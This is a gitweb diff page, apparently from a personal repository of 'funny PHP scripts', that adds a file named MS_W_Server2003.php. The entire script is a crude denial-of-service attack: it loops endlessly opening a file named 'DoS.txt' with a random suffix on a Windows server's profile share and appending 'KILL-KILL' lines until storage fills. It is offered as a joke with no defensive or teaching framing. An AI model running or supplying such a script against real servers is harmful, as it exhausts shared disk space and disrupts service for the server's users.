Some funny PHP scripts found on my old USB disk
[mirrors/Programs.git] / php / MS_W_Server2003.php
diff --git a/php/MS_W_Server2003.php b/php/MS_W_Server2003.php
new file mode 100755 (executable)
index 0000000..c72e995
--- /dev/null
@@ -0,0 +1,14 @@
+<?php\r
+$path = "\\\\winserver2003\\profily\\profilek";\r
+$file = "DoS.txt".rand(1,999999);\r
+\r
+while(1) {\r
+\r
+$fp = fopen("$path\\$file", "a") or die("Cannot fopen!!!\n");\r
+echo("fopen\n");\r
+while(!feof($fp)) {\r
+       fwrite($fp, "KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL\r\n");\r
+}\r
+fclose($fp);\r
+\r
+}
\ No newline at end of file
This page took 0.124845 seconds and 4 git commands to generate.